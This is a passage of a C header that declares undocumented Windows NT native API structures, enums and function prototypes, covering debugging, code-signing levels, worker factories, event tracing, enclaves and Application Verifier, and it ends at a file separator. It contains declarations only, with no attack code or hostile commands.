_Inout_opt_ PVOID ConnectionInformation,
_Inout_opt_ PULONG ConnectionInformationLength);
/************************************************************************************
*
* Boot Management API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtEnumerateBootEntries(
_Out_writes_bytes_opt_(*BufferLength) PVOID Buffer,
_Inout_ PULONG BufferLength);
/************************************************************************************
*
* Reserve Objects API.
*
************************************************************************************/
typedef enum _MEMORY_RESERVE_TYPE {
MemoryReserveUserApc,
MemoryReserveIoCompletion,
MemoryReserveTypeMax
} MEMORY_RESERVE_TYPE;
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateReserveObject(
_Out_ PHANDLE MemoryReserveHandle,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ MEMORY_RESERVE_TYPE Type);
/************************************************************************************
*
* Debug API.
*
************************************************************************************/
//
// Define the debug object thats used to attatch to processes that are being debugged.
//
#define DEBUG_OBJECT_DELETE_PENDING (0x1) // Debug object is delete pending.
#define DEBUG_OBJECT_KILL_ON_CLOSE (0x2) // Kill all debugged processes on close
typedef struct _DEBUG_OBJECT {
//
// Event thats set when the EventList is populated.
//
KEVENT EventsPresent;
//
// Mutex to protect the structure
//
FAST_MUTEX Mutex;
//
// Queue of events waiting for debugger intervention
//
LIST_ENTRY EventList;
//
// Flags for the object
//
ULONG Flags;
} DEBUG_OBJECT, *PDEBUG_OBJECT;
typedef enum _DEBUGOBJECTINFOCLASS {
DebugObjectUnusedInformation,
DebugObjectKillProcessOnExitInformation,
MaxDebugObjectInfoClass
} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;
typedef struct _DBGKM_EXCEPTION {
EXCEPTION_RECORD ExceptionRecord;
ULONG FirstChance;
} DBGKM_EXCEPTION, * PDBGKM_EXCEPTION;
typedef struct _DBGKM_CREATE_THREAD {
ULONG SubSystemKey;
PVOID StartAddress;
} DBGKM_CREATE_THREAD, * PDBGKM_CREATE_THREAD;
typedef struct _DBGKM_CREATE_PROCESS {
ULONG SubSystemKey;
HANDLE FileHandle;
PVOID BaseOfImage;
ULONG DebugInfoFileOffset;
ULONG DebugInfoSize;
DBGKM_CREATE_THREAD InitialThread;
} DBGKM_CREATE_PROCESS, * PDBGKM_CREATE_PROCESS;
typedef struct _DBGKM_EXIT_THREAD {
NTSTATUS ExitStatus;
} DBGKM_EXIT_THREAD, * PDBGKM_EXIT_THREAD;
typedef struct _DBGKM_EXIT_PROCESS {
NTSTATUS ExitStatus;
} DBGKM_EXIT_PROCESS, * PDBGKM_EXIT_PROCESS;
typedef struct _DBGKM_LOAD_DLL {
HANDLE FileHandle;
PVOID BaseOfDll;
ULONG DebugInfoFileOffset;
ULONG DebugInfoSize;
PVOID NamePointer;
} DBGKM_LOAD_DLL, * PDBGKM_LOAD_DLL;
typedef struct _DBGKM_UNLOAD_DLL {
PVOID BaseAddress;
} DBGKM_UNLOAD_DLL, * PDBGKM_UNLOAD_DLL;
typedef enum _DBG_STATE {
DbgIdle,
DbgReplyPending,
DbgCreateThreadStateChange,
DbgCreateProcessStateChange,
DbgExitThreadStateChange,
DbgExitProcessStateChange,
DbgExceptionStateChange,
DbgBreakpointStateChange,
DbgSingleStepStateChange,
DbgLoadDllStateChange,
DbgUnloadDllStateChange
} DBG_STATE, * PDBG_STATE;
typedef struct _DBGUI_CREATE_THREAD {
HANDLE HandleToThread;
DBGKM_CREATE_THREAD NewThread;
} DBGUI_CREATE_THREAD, * PDBGUI_CREATE_THREAD;
typedef struct _DBGUI_CREATE_PROCESS {
HANDLE HandleToProcess;
HANDLE HandleToThread;
DBGKM_CREATE_PROCESS NewProcess;
} DBGUI_CREATE_PROCESS, * PDBGUI_CREATE_PROCESS;
typedef struct _DBGUI_WAIT_STATE_CHANGE {
DBG_STATE NewState;
CLIENT_ID AppClientId;
union
{
DBGKM_EXCEPTION Exception;
DBGUI_CREATE_THREAD CreateThread;
DBGUI_CREATE_PROCESS CreateProcessInfo;
DBGKM_EXIT_THREAD ExitThread;
DBGKM_EXIT_PROCESS ExitProcess;
DBGKM_LOAD_DLL LoadDll;
DBGKM_UNLOAD_DLL UnloadDll;
} StateInfo;
} DBGUI_WAIT_STATE_CHANGE, * PDBGUI_WAIT_STATE_CHANGE;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateDebugObject(
_Out_ PHANDLE DebugObjectHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationDebugObject(
_In_ HANDLE DebugObjectHandle,
_In_ DEBUGOBJECTINFOCLASS DebugObjectInformationClass,
_In_reads_bytes_(DebugInformationLength) PVOID DebugInformation,
_In_ ULONG DebugInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtDebugActiveProcess(
_In_ HANDLE ProcessHandle,
_In_ HANDLE DebugObjectHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtDebugContinue(
_In_ HANDLE DebugObjectHandle,
_In_ PCLIENT_ID ClientId,
_In_ NTSTATUS ContinueStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtWaitForDebugEvent(
_In_ HANDLE DebugObjectHandle,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout,
_Out_ PDBGUI_WAIT_STATE_CHANGE WaitStateChange
);
NTSYSAPI
NTSTATUS
NTAPI
NtRemoveProcessDebug(
_In_ HANDLE ProcessHandle,
_In_ HANDLE DebugObjectHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryDebugFilterState(
_In_ ULONG ComponentId,
_In_ ULONG Level);
NTSYSAPI
NTSTATUS
NTAPI
NtSetDebugFilterState(
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_ BOOLEAN State);
/************************************************************************************
*
* Profile API.
*
************************************************************************************/
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum
} KPROFILE_SOURCE;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateProfile(
_Out_ PHANDLE ProfileHandle,
_In_opt_ HANDLE Process,
_In_ PVOID ProfileBase,
_In_ SIZE_T ProfileSize,
_In_ ULONG BucketSize,
_In_reads_bytes_(BufferSize) PULONG Buffer,
_In_ ULONG BufferSize,
_In_ KPROFILE_SOURCE ProfileSource,
_In_ KAFFINITY Affinity);
NTSYSAPI
NTSTATUS
NTAPI
NtStartProfile(
_In_ HANDLE ProfileHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtStopProfile(
_In_ HANDLE ProfileHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryIntervalProfile(
_In_ KPROFILE_SOURCE ProfileSource,
_Out_ PULONG Interval);
NTSYSAPI
NTSTATUS
NTAPI
NtSetIntervalProfile(
_In_ ULONG Interval,
_In_ KPROFILE_SOURCE Source);
/************************************************************************************
*
* Signing Levels API.
*
************************************************************************************/
typedef UCHAR SE_SIGNING_LEVEL, *PSE_SIGNING_LEVEL;
typedef struct _SE_FILE_CACHE_CLAIM_INFORMATION {
ULONG Size;
PVOID Claim;
} SE_FILE_CACHE_CLAIM_INFORMATION, *PSE_FILE_CACHE_CLAIM_INFORMATION;
typedef struct _SE_SET_FILE_CACHE_INFORMATION {
ULONG Size;
UNICODE_STRING CatalogDirectoryPath;
SE_FILE_CACHE_CLAIM_INFORMATION OriginClaimInfo;
} SE_SET_FILE_CACHE_INFORMATION, *PSE_SET_FILE_CACHE_INFORMATION;
#ifndef SE_SIGNING_LEVEL_UNCHECKED
#define SE_SIGNING_LEVEL_UNCHECKED 0x00000000
#endif
#ifndef SE_SIGNING_LEVEL_UNSIGNED
#define SE_SIGNING_LEVEL_UNSIGNED 0x00000001
#endif
#ifndef SE_SIGNING_LEVEL_ENTERPRISE
#define SE_SIGNING_LEVEL_ENTERPRISE 0x00000002
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_1
#define SE_SIGNING_LEVEL_CUSTOM_1 0x00000003
#endif
#ifndef SE_SIGNING_LEVEL_DEVELOPER
#define SE_SIGNING_LEVEL_DEVELOPER SE_SIGNING_LEVEL_CUSTOM_1
#endif
#ifndef SE_SIGNING_LEVEL_AUTHENTICODE
#define SE_SIGNING_LEVEL_AUTHENTICODE 0x00000004
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_2
#define SE_SIGNING_LEVEL_CUSTOM_2 0x00000005
#endif
#ifndef SE_SIGNING_LEVEL_STORE
#define SE_SIGNING_LEVEL_STORE 0x00000006
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_3
#define SE_SIGNING_LEVEL_CUSTOM_3 0x00000007
#endif
#ifndef SE_SIGNING_LEVEL_ANTIMALWARE
#define SE_SIGNING_LEVEL_ANTIMALWARE SE_SIGNING_LEVEL_CUSTOM_3
#endif
#ifndef SE_SIGNING_LEVEL_MICROSOFT
#define SE_SIGNING_LEVEL_MICROSOFT 0x00000008
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_4
#define SE_SIGNING_LEVEL_CUSTOM_4 0x00000009
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_5
#define SE_SIGNING_LEVEL_CUSTOM_5 0x0000000A
#endif
#ifndef SE_SIGNING_LEVEL_DYNAMIC_CODEGEN
#define SE_SIGNING_LEVEL_DYNAMIC_CODEGEN 0x0000000B
#endif
#ifndef SE_SIGNING_LEVEL_WINDOWS
#define SE_SIGNING_LEVEL_WINDOWS 0x0000000C
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_7
#define SE_SIGNING_LEVEL_CUSTOM_7 0x0000000D
#endif
#ifndef SE_SIGNING_LEVEL_WINDOWS_TCB
#define SE_SIGNING_LEVEL_WINDOWS_TCB 0x0000000E
#endif
#ifndef SE_SIGNING_LEVEL_CUSTOM_6
#define SE_SIGNING_LEVEL_CUSTOM_6 0x0000000F
#endif
NTSYSAPI
NTSTATUS
NTAPI
NtSetCachedSigningLevel(
_In_ ULONG Flags,
_In_ SE_SIGNING_LEVEL InputSigningLevel,
_In_reads_(SourceFileCount) PHANDLE SourceFiles,
_In_ ULONG SourceFileCount,
_In_opt_ HANDLE TargetFile);
NTSYSAPI
NTSTATUS
NTAPI
NtSetCachedSigningLevel2(
_In_ ULONG Flags,
_In_ SE_SIGNING_LEVEL InputSigningLevel,
_In_reads_(SourceFileCount) PHANDLE SourceFiles,
_In_ ULONG SourceFileCount,
_In_opt_ HANDLE TargetFile,
_In_opt_ SE_SET_FILE_CACHE_INFORMATION* CacheInformation);
NTSYSAPI
NTSTATUS
NTAPI
NtGetCachedSigningLevel(
_In_ HANDLE File,
_Out_ PULONG Flags,
_Out_ PSE_SIGNING_LEVEL SigningLevel,
_Out_writes_bytes_to_opt_(*ThumbprintSize, *ThumbprintSize) PUCHAR Thumbprint,
_Inout_opt_ PULONG ThumbprintSize,
_Out_opt_ PULONG ThumbprintAlgorithm);
//REDSTONE 2 and above
NTSYSAPI
NTSTATUS
NTAPI
NtCompareSigningLevels(
_In_ SE_SIGNING_LEVEL FirstSigningLevel,
_In_ SE_SIGNING_LEVEL SecondSigningLevel);
/************************************************************************************
*
* Worker Factory API.
*
************************************************************************************/
typedef enum _WORKERFACTORYINFOCLASS {
WorkerFactoryTimeout,
WorkerFactoryRetryTimeout,
WorkerFactoryIdleTimeout,
WorkerFactoryBindingCount,
WorkerFactoryThreadMinimum,
WorkerFactoryThreadMaximum,
WorkerFactoryPaused,
WorkerFactoryBasicInformation,
WorkerFactoryAdjustThreadGoal,
WorkerFactoryCallbackType,
WorkerFactoryStackInformation,
WorkerFactoryThreadBasePriority,
WorkerFactoryTimeoutWaiters,
WorkerFactoryFlags,
WorkerFactoryThreadSoftMaximum,
MaxWorkerFactoryInfoClass
} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;
typedef struct _WORKER_FACTORY_BASIC_INFORMATION {
LARGE_INTEGER Timeout;
LARGE_INTEGER RetryTimeout;
LARGE_INTEGER IdleTimeout;
BOOLEAN Paused;
BOOLEAN TimerSet;
BOOLEAN QueuedToExWorker;
BOOLEAN MayCreate;
BOOLEAN CreateInProgress;
BOOLEAN InsertedIntoQueue;
BOOLEAN Shutdown;
ULONG BindingCount;
ULONG ThreadMinimum;
ULONG ThreadMaximum;
ULONG PendingWorkerCount;
ULONG WaitingWorkerCount;
ULONG TotalWorkerCount;
ULONG ReleaseCount;
LONGLONG InfiniteWaitGoal;
PVOID StartRoutine;
PVOID StartParameter;
HANDLE ProcessId;
SIZE_T StackReserve;
SIZE_T StackCommit;
NTSTATUS LastThreadCreationStatus;
} WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateWorkerFactory(
_Out_ PHANDLE WorkerFactoryHandleReturn,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE CompletionPortHandle,
_In_ HANDLE WorkerProcessHandle,
_In_ PVOID StartRoutine,
_In_opt_ PVOID StartParameter,
_In_opt_ ULONG MaxThreadCount,
_In_opt_ SIZE_T StackReserve,
_In_opt_ SIZE_T StackCommit);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationWorkerFactory(
_In_ HANDLE WorkerFactoryHandle,
_In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
_Out_writes_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation,
_In_ ULONG WorkerFactoryInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtShutdownWorkerFactory(
_In_ HANDLE WorkerFactoryHandle,
_Inout_ volatile LONG *PendingWorkerCount);
NTSYSAPI
NTSTATUS
NTAPI
NtReleaseWorkerFactoryWorker(
_In_ HANDLE WorkerFactoryHandle);
/************************************************************************************
*
* Event Tracing API.
*
************************************************************************************/
typedef enum _TRACE_CONTROL_INFORMATION_CLASS {
TraceControlStartLogger = 1,
TraceControlStopLogger = 2,
TraceControlQueryLogger = 3,
TraceControlUpdateLogger = 4,
TraceControlFlushLogger = 5,
TraceControlIncrementLoggerFile = 6,
TraceControlInvalidClass1 = 7,
TraceControlInvalidCalss2 = 8,
TraceControlInvalidClass3 = 9,
TraceControlInvalidClass4 = 10,
TraceControlRealtimeConnect = 11,
TraceControlWdiDispatchControl = 13,
TraceControlRealtimeDisconnectConsumerByHandle = 14,
TraceControlReceiveNotification = 16,
TraceControlEnableGuid = 17,
TraceControlSendReplyDataBlock = 18,
TraceControlReceiveReplyDataBlock = 19,
TraceControlWdiUpdateSem = 20,
TraceControlGetTraceGuidList = 21,
TraceControlGetTraceGuidInfo = 22,
TraceControlEnumerateTraceGuids = 23,
TraceControlInvalidClass5 = 24,
TraceControlQueryReferenceTime = 25,
TraceControlTrackProviderBinary = 26,
TraceControlAddNotificationEvent = 27,
TraceControlUpdateDisallowList = 28,
TraceControlInvalidClass6 = 29,
TraceControlInvalidClass7 = 30,
TraceControlUseDescriptorTypeUm = 31,
TraceControlGetTraceGroupList = 32,
TraceControlGetTraceGroupInfo = 33,
TraceControlTraceSetDisallowList = 34,
TraceControlSetCompressionSettings = 35,
TraceControlGetCompressionSettings = 36,
TraceControlUpdatePeriodicCaptureState = 37,
TraceControlGetPrivateSessionTraceHandle = 38,
TraceControlRegisterPrivateSession = 39,
TraceControlQuerySessionDemuxObject = 40,
TraceControlSetProviderBinaryTracking = 41,
TraceControlMaxLoggers = 42,
TraceControlMaxPmcCounter = 43
} TRACE_CONTROL_INFORMATION_CLASS;
NTSYSAPI
NTSTATUS
NTAPI
NtTraceEvent(
_In_ HANDLE TraceHandle,
_In_ ULONG Flags,
_In_ ULONG FieldSize,
_In_ PVOID Fields);
NTSYSAPI
NTSTATUS
NTAPI
NtTraceControl(
_In_ TRACE_CONTROL_INFORMATION_CLASS TraceInformationClass,
_In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_writes_bytes_opt_(TraceInformationLength) PVOID TraceInformation,
_In_ ULONG TraceInformationLength,
_Out_ PULONG ReturnLength);
/************************************************************************************
*
* Enclave API.
*
************************************************************************************/
#ifndef _WIN32_WINNT_WIN10
#define _WIN32_WINNT_WIN10 0x0A00
#endif
#if (_WIN32_WINNT < _WIN32_WINNT_WIN10)
typedef LPVOID(WINAPI* PENCLAVE_ROUTINE) (LPVOID lpThreadParameter);
typedef PENCLAVE_ROUTINE LPENCLAVE_ROUTINE;
#endif
NTSYSAPI
NTSTATUS
NTAPI
NtCreateEnclave(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_In_ ULONG_PTR ZeroBits,
_In_ SIZE_T Size,
_In_ SIZE_T InitialCommitment,
_In_ ULONG EnclaveType,
_In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,
_In_ ULONG EnclaveInformationLength,
_Out_opt_ PULONG EnclaveError);
NTSYSAPI
NTSTATUS
NTAPI
NtLoadEnclaveData(
_In_ HANDLE ProcessHandle,
_In_ PVOID BaseAddress,
_In_reads_bytes_(BufferSize) PVOID Buffer,
_In_ SIZE_T BufferSize,
_In_ ULONG Protect,
_In_reads_bytes_(PageInformationLength) PVOID PageInformation,
_In_ ULONG PageInformationLength,
_Out_opt_ PSIZE_T NumberOfBytesWritten,
_Out_opt_ PULONG EnclaveError);
NTSYSAPI
NTSTATUS
NTAPI
NtInitializeEnclave(
_In_ HANDLE ProcessHandle,
_In_ PVOID BaseAddress,
_In_reads_bytes_(EnclaveInformationLength) PVOID EnclaveInformation,
_In_ ULONG EnclaveInformationLength,
_Out_opt_ PULONG EnclaveError);
NTSYSAPI
NTSTATUS
NTAPI
NtTerminateEnclave(
_In_ PVOID BaseAddress,
_In_ BOOLEAN WaitForThread);
NTSYSAPI
NTSTATUS
NTAPI
NtCallEnclave(
_In_ PENCLAVE_ROUTINE Routine,
_In_ PVOID Parameter,
_In_ BOOLEAN WaitForThread,
_Out_opt_ PVOID* ReturnValue);
/************************************************************************************
*
* LUID/UUID API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtSetUuidSeed(
_In_ PCHAR Seed);
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateUuids(
_Out_ PULARGE_INTEGER Time,
_Out_ PULONG Range,
_Out_ PULONG Sequence,
_Out_ PCHAR Seed);
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateLocallyUniqueId(
_Out_ PLUID Luid);
/************************************************************************************
*
* Kernel Debugger API.
*
************************************************************************************/
typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {
BOOLEAN KernelDebuggerEnabled;
BOOLEAN KernelDebuggerNotPresent;
} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;
typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX {
BOOLEAN DebuggerAllowed;
BOOLEAN DebuggerEnabled;
BOOLEAN DebuggerPresent;
} SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION_EX;
typedef enum _SYSDBG_COMMAND {
SysDbgQueryModuleInformation,
SysDbgQueryTraceInformation,
SysDbgSetTracepoint,
SysDbgSetSpecialCall,
SysDbgClearSpecialCalls,
SysDbgQuerySpecialCalls,
SysDbgBreakPoint,
SysDbgQueryVersion,
SysDbgReadVirtual,
SysDbgWriteVirtual,
SysDbgReadPhysical,
SysDbgWritePhysical,
SysDbgReadControlSpace,
SysDbgWriteControlSpace,
SysDbgReadIoSpace,
SysDbgWriteIoSpace,
SysDbgReadMsr,
SysDbgWriteMsr,
SysDbgReadBusData,
SysDbgWriteBusData,
SysDbgCheckLowMemory,
SysDbgEnableKernelDebugger,
SysDbgDisableKernelDebugger,
SysDbgGetAutoKdEnable,
SysDbgSetAutoKdEnable,
SysDbgGetPrintBufferSize,
SysDbgSetPrintBufferSize,
SysDbgGetKdUmExceptionEnable,
SysDbgSetKdUmExceptionEnable,
SysDbgGetTriageDump,
SysDbgGetKdBlockEnable,
SysDbgSetKdBlockEnable,
SysDbgRegisterForUmBreakInfo,
SysDbgGetUmBreakPid,
SysDbgClearUmBreakPid,
SysDbgGetUmAttachPid,
SysDbgClearUmAttachPid,
SysDbgGetLiveKernelDump,
SysDbgKdPullRemoteFile,
SysDbgMaxInfoClass
} SYSDBG_COMMAND, *PSYSDBG_COMMAND;
typedef struct _SYSDBG_VIRTUAL {
PVOID Address;
PVOID Buffer;
ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
_In_ SYSDBG_COMMAND Command,
_Inout_updates_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
_In_ ULONG OutputBufferLength,
_Out_opt_ PULONG ReturnLength);
/************************************************************************************
*
* HardError API.
*
************************************************************************************/
#ifndef HARDERROR_OVERRIDE_ERRORMODE
#define HARDERROR_OVERRIDE_ERRORMODE 0x10000000
#endif
typedef enum _HARDERROR_RESPONSE_OPTION {
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem,
OptionOkNoWait,
OptionCancelTryContinue
} HARDERROR_RESPONSE_OPTION;
typedef enum _HARDERROR_RESPONSE {
ResponseReturnToCaller,
ResponseNotHandled,
ResponseAbort,
ResponseCancel,
ResponseIgnore,
ResponseNo,
ResponseOk,
ResponseRetry,
ResponseYes,
ResponseTryAgain,
ResponseContinue
} HARDERROR_RESPONSE;
NTSYSCALLAPI
NTSTATUS
NTAPI
NtRaiseHardError(
_In_ NTSTATUS ErrorStatus,
_In_ ULONG NumberOfParameters,
_In_ ULONG UnicodeStringParameterMask,
_In_reads_(NumberOfParameters) PULONG_PTR Parameters,
_In_ ULONG ValidResponseOptions,
_Out_ PULONG Response);
/************************************************************************************
*
* IoRing API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtCreateIoRing(
_Out_ PHANDLE IoRingHandle,
_In_ ULONG CreateParametersLength,
_In_ PVOID CreateParameters,
_In_ ULONG OutputParametersLength,
_Out_ PVOID OutputParameters);
/************************************************************************************
*
* Thread Pooling API and definitions.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
TpAllocPool(
_Out_ PTP_POOL* PoolReturn,
_Reserved_ PVOID Reserved);
NTSYSAPI
VOID
NTAPI
TpReleasePool(
_Inout_ PTP_POOL Pool);
NTSYSAPI
NTSTATUS
NTAPI
TpAllocWork(
_Out_ PTP_WORK* WorkReturn,
_In_ PTP_WORK_CALLBACK Callback,
_Inout_opt_ PVOID Context,
_In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron);
NTSYSAPI
VOID
NTAPI
TpReleaseWork(
_Inout_ PTP_WORK Work);
NTSYSAPI
VOID
NTAPI
TpPostWork(
_Inout_ PTP_WORK Work);
NTSYSAPI
VOID
NTAPI
TpWaitForWork(
_Inout_ PTP_WORK Work,
_In_ LOGICAL CancelPendingCallbacks);
/************************************************************************************
*
* ApiSet definitions.
*
************************************************************************************/
NTSYSAPI
BOOL
NTAPI
ApiSetQueryApiSetPresence(
_In_ PCUNICODE_STRING Namespace,
_Out_ PBOOLEAN Present);
NTSYSAPI
BOOL
NTAPI
ApiSetQueryApiSetPresenceEx(
_In_ PCUNICODE_STRING Namespace,
_Out_ PBOOLEAN IsInSchema,
_Out_ PBOOLEAN Present);
/************************************************************************************
*
* Application Verifier API and definitions.
*
************************************************************************************/
#ifndef DLL_PROCESS_VERIFIER
#define DLL_PROCESS_VERIFIER 4
#endif
typedef VOID(NTAPI *RTL_VERIFIER_DLL_LOAD_CALLBACK)(
PWSTR DllName,
PVOID DllBase,
SIZE_T DllSize,
PVOID Reserved);
typedef VOID(NTAPI *RTL_VERIFIER_DLL_UNLOAD_CALLBACK)(
PWSTR DllName,
PVOID DllBase,
SIZE_T DllSize,
PVOID Reserved);
typedef VOID(NTAPI *RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK)(
PVOID AllocationBase,
SIZE_T AllocationSize);
typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
PCHAR ThunkName;
PVOID ThunkOldAddress;
PVOID ThunkNewAddress;
} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;
typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
PWCHAR DllName;
DWORD DllFlags;
PVOID DllAddress;
PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;
typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
DWORD Length;
PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;
PWSTR VerifierImage;
DWORD VerifierFlags;
DWORD VerifierDebug;
PVOID RtlpGetStackTraceAddress;
PVOID RtlpDebugPageHeapCreate;
PVOID RtlpDebugPageHeapDestroy;
RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
} RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR;
//
// Application verifier standard flags.
//
#define RTL_VRF_FLG_FULL_PAGE_HEAP 0x00000001
#define RTL_VRF_FLG_RESERVED_DONOTUSE 0x00000002
#define RTL_VRF_FLG_HANDLE_CHECKS 0x00000004
#define RTL_VRF_FLG_STACK_CHECKS 0x00000008
#define RTL_VRF_FLG_APPCOMPAT_CHECKS 0x00000010
#define RTL_VRF_FLG_TLS_CHECKS 0x00000020
#define RTL_VRF_FLG_DIRTY_STACKS 0x00000040
#define RTL_VRF_FLG_RPC_CHECKS 0x00000080
#define RTL_VRF_FLG_COM_CHECKS 0x00000100
#define RTL_VRF_FLG_DANGEROUS_APIS 0x00000200
#define RTL_VRF_FLG_RACE_CHECKS 0x00000400
#define RTL_VRF_FLG_DEADLOCK_CHECKS 0x00000800
#define RTL_VRF_FLG_FIRST_CHANCE_EXCEPTION_CHECKS 0x00001000
#define RTL_VRF_FLG_VIRTUAL_MEM_CHECKS 0x00002000
#define RTL_VRF_FLG_ENABLE_LOGGING 0x00004000
#define RTL_VRF_FLG_FAST_FILL_HEAP 0x00008000
#define RTL_VRF_FLG_VIRTUAL_SPACE_TRACKING 0x00010000
#define RTL_VRF_FLG_ENABLED_SYSTEM_WIDE 0x00020000
#define RTL_VRF_FLG_MISCELLANEOUS_CHECKS 0x00020000
#define RTL_VRF_FLG_LOCK_CHECKS 0x00040000
NTSYSAPI
VOID
NTAPI
RtlApplicationVerifierStop(
_In_ ULONG_PTR Code,
_In_ PSTR Message,
_In_ ULONG_PTR Param1,
_In_ PSTR Description1,
_In_ ULONG_PTR Param2,
_In_ PSTR Description2,
_In_ ULONG_PTR Param3,
_In_ PSTR Description3,
_In_ ULONG_PTR Param4,
_In_ PSTR Description4);
#ifndef VERIFIER_STOP
#define VERIFIER_STOP(Code, Msg, P1, S1, P2, S2, P3, S3, P4, S4) { \
RtlApplicationVerifierStop ((Code), \
(Msg), \
(ULONG_PTR)(P1),(S1), \
(ULONG_PTR)(P2),(S2), \
(ULONG_PTR)(P3),(S3), \
(ULONG_PTR)(P4),(S4)); \
}
#endif
/************************************************************************************
*
* CPU partition API & definitions.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtOpenCpuPartition(
_Out_ PHANDLE CpuPartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateCpuPartition(
_Out_ PHANDLE CpuPartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationCpuPartition(
_In_ HANDLE CpuPartitionHandle,
_In_ ULONG CpuPartitionInformationClass,
_In_reads_bytes_(CpuPartitionInformationLength) PVOID CpuPartitionInformation,
_In_ ULONG CpuPartitionInformationLength,
_Reserved_ PVOID Reserved0,
_Reserved_ ULONG Reserved1,
_Reserved_ ULONG Reserved2);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationCpuPartition(
_In_ HANDLE CpuPartitionHandle,
_In_ ULONG CpuPartitionInformationClass,
_Out_writes_bytes_opt_(CpuPartitionInformationLength) PVOID CpuPartitionInformation,
_In_ ULONG CpuPartitionInformationLength,
_Out_opt_ PULONG ReturnLength);
//
// NTOS_RTL HEADER END
//
#ifdef __cplusplus
}
#endif
#pragma warning(pop)
#endif NTOS_RTL
================================================
FILE: Source/Shared/ntos/ntsxs.h
================================================
/************************************************************************************
*
